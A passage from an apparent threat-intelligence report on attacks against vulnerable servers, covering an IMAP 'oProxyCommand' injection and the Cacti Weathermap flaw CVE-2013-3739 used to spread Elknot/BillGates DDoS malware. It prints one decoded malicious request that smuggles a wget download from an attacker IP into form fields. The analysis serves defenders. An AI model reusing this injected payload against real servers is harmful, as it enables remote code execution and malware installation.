After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is:

oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit.

Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze.

Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739)

Another known threat actor was detected trying to exploit the PHP Weathermap Editor Cacti plugin. This vulnerability was first disclosed in April 2013. The threat actor attacks the vulnerability in PHP Weathermap and tries to download and execute a variant of Elknot/BillGates malware. Elknot is an infamous DDoS botnet family that runs on Linux and Windows systems. This malware, first detected in 2014, is used to launch DDoS attacks and seems to be spreading again. The attack vectors available within the malware include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP flood (Layer7), and DNS reflection floods. As we can see in Figure 8, 33 engines on VirusTotal.com detected this file as malicious.